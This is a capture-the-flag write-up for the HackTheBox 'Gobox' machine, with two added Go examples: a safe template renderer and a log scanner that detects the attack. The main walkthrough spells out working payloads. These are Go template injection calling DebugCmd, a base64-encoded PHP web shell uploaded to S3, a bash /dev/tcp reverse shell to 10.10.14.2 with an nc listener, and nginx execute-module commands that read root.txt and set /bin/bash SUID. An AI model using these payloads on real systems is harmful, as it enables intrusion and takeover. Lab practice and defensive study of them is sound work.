HackTheBox Gobox Writeup
Explore the fundamentals of cybersecurity in the Gobox Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.113 gobox.htb
Script to add hosts automatically
ip="10.10.11.113"
domain="gobox.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV gobox.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-30 02:46 CEST
Nmap scan report for gobox.htb (10.10.11.113)
Host is up (0.050s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http nginx
|_http-title: Hacking eSports | {{.Title}}
8080/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Identify the Vulnerability
- The target site at http://gobox.htb:8080/ is running a Go-based application, as indicated by the X-Forwarded-Server: golang header in Burp Suite responses (the unrendered {{.Title}} in the port 80 page title from the nmap scan points the same way).
- Based on that response, the application could be vulnerable to Server-Side Template Injection (SSTI) through Go templates.
Initial SSTI Test
- On the /forgot page, insert the payload {{ . }} in the email field to test for template injection.
- If vulnerable, this will reveal Go template context variables or throw an error exposing internal details of the server.
Exploiting DebugCmd
- After successfully logging in with the credentials sent via email from the /forgot page, the source code of the application is revealed.
- You discover the DebugCmd function in the template engine, which allows the execution of system commands.
Test system commands using the following payloads:
{{ .DebugCmd "id" }} // Check for user privileges
{{ .DebugCmd "env" }} // View environment variables
{{ .DebugCmd "aws s3 ls s3://" }} // List S3 buckets
{{ .DebugCmd "aws s3 ls s3://website" }} // List contents of a specific bucket
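The root cause behind the DebugCmd payloads above is that user text reaches the template parser, so every exported field and method on the data value becomes callable. The Go program below is an added example, not code from the Gobox application: it puts a vulnerable handler that splices the email field into the template source next to the fixed-template version that only passes the input as data. Context, Secret and Shout are constructed stand-ins and no command is executed.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
)

// Context is the value handed to the template. Every exported field and method
// on it is reachable from template code, which is how Gobox's DebugCmd became
// callable once user text was parsed as template source.
type Context struct {
	Secret string // constructed stand-in for data the user must never see
}

// Shout is a harmless stand-in for a privileged helper such as DebugCmd.
func (c Context) Shout(s string) string { return "[" + s + "]" }
var ctx = Context{Secret: "constructed-secret-value"}

// RenderVulnerable splices user input into the template source, so any
// {{ ... }} the user sends is parsed and evaluated against ctx.
func RenderVulnerable(email string) (string, error) {
	t, err := template.New("forgot").Parse("<p>Reset link sent to " + email + "</p>")
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, ctx); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// safeTmpl is parsed once from a constant; user input only ever arrives as data.
var safeTmpl = template.Must(template.New("forgot").Parse("<p>Reset link sent to {{.Email}}</p>"))

// RenderSafe passes the input as a value: html/template escapes it and the
// parser never sees it as code, so {{ .Secret }} comes back as literal text.
func RenderSafe(email string) (string, error) {
	var buf bytes.Buffer
	err := safeTmpl.Execute(&buf, struct{ Email string }{email})
	return buf.String(), err
}

func main() {
	probe := `{{ .Secret }} {{ .Shout "probe" }}`
	v, _ := RenderVulnerable(probe)
	s, _ := RenderSafe(probe)
	fmt.Println("vulnerable:", v, "\nsafe:", s)
}
```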
Preparing the Payload
- The goal is to upload a PHP reverse shell to the S3 bucket via the AWS CLI exposed through DebugCmd.
- First, generate a base64-encoded PHP reverse shell:
echo '<?php system($_GET['cmd']); ?>' | base64
This will output the encoded payload:
PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=
- Use DebugCmd to decode and save this as a PHP file on the target system, and then upload it to the S3 bucket.
{{ .DebugCmd "echo -n PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo= | base64 -d > /tmp/evil.php" }}
{{ .DebugCmd "aws s3 cp /tmp/evil.php s3://website/evil.php" }}
Accessing the Payload
- Once the reverse shell script is uploaded, it can be accessed via:
You can then execute commands by passing the cmd parameter.
Triggering the Reverse Shell
To establish a reverse shell, use the following bash command:
bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'
Since this needs to be URL-encoded, use sed to encode only the & and / characters:
echo -n "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" | sed -e 's:/:%2f:g' -e 's:&:%26:g'
Setting Up a Listener
On your local machine, set up a listener to catch the reverse shell:
nc -lvnp 9001
Triggering the Shell
To trigger the reverse shell, visit:
http://gobox.htb/evil.php?cmd=bash -c '%2fbin%2fbash -i >%26 %2fdev%2ftcp%2f10.10.14.2%2f9001 0>%261'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
Nginx Module Exploitation (ngx_http_execute_module)
Initial Enumeration
Retrieve the user flag from /home/ubuntu/user.txt:
cat /home/ubuntu/user.txt
Investigate Nginx configuration:
ls /etc/nginx/sites-enabled
cat /etc/nginx/sites-enabled/default
You find the custom directive command on;, which is not part of the default Nginx setup, indicating a custom module.
Identifying the Custom Module
A Google search for command on; nginx github reveals the NginxExecute module, which allows command execution via Nginx.
Verifying the Nginx Module
- To confirm the presence of this module and its functionality, you inspect the Nginx module binary for references to the run function:
strings /usr/share/nginx/modules/ngx_http_execute_module.so | grep run
Command Execution
Use the ippsec.run parameter in HTTP requests to execute system commands. Test with a basic command:
curl -g "http://127.0.0.1:8000/?ippsec.run[id]"
curl -g "http://127.0.0.1:8000/?ippsec.run[cat /root/root.txt]"
curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 4755 /bin/bash]"
/bin/bash -p
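From the defender's side, both command channels in this writeup (the cmd= parameter of the uploaded PHP file and the ippsec.run[...] key consumed by the execute module) leave the command in the nginx access log. The Go scanner below is an added example, not part of the writeup: it parses constructed lines in nginx's default combined log format, percent-decodes the request target, and reports which channel each hit used and the command it carried.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)
// Constructed sample lines in nginx's default "combined" log format; they are
// not taken from the Gobox machine.
const sampleLog = `10.10.14.2 - - [30/Sep/2024:02:50:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.2 - - [30/Sep/2024:02:51:12 +0000] "GET /evil.php?cmd=cat%20%2fetc%2fhostname HTTP/1.1" 200 0 "-" "curl/7.88"
127.0.0.1 - - [30/Sep/2024:02:52:30 +0000] "GET /?ippsec.run[id] HTTP/1.1" 200 38 "-" "curl/7.88"
`

// Finding records one suspicious request and the command it carried.
type Finding struct{ Client, Rule, Command string }
var (
	reqLine  = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) `)
	runParam = regexp.MustCompile(`ippsec\.run\[([^\]]*)\]`)
)
// ScanAccessLog flags the two command channels seen on Gobox: a webshell-style
// cmd= parameter on a .php path and the ngx_http_execute ippsec.run[...] key.
func ScanAccessLog(log string) []Finding {
	var out []Finding
	for _, line := range strings.Split(log, "\n") {
		m := reqLine.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		client, target := m[1], m[2]
		// Undo percent-encoding so %2f-style obfuscation does not hide the command.
		decoded, err := url.QueryUnescape(target)
		if err != nil {
			decoded = target
		}
		if r := runParam.FindStringSubmatch(decoded); r != nil {
			out = append(out, Finding{client, "nginx-execute-module", r[1]})
			continue
		}
		if u, err := url.Parse(target); err == nil && strings.HasSuffix(u.Path, ".php") {
			if cmd := u.Query().Get("cmd"); cmd != "" {
				out = append(out, Finding{client, "php-webshell-cmd", cmd})
			}
		}
	}
	return out
}

func main() { fmt.Println(ScanAccessLog(sampleLog)) }
```

Pointing the same scan at the real access log (typically /var/log/nginx/access.log) is enough to surface both channels after the fact; blocking them requires removing the module and the uploaded file, not just logging.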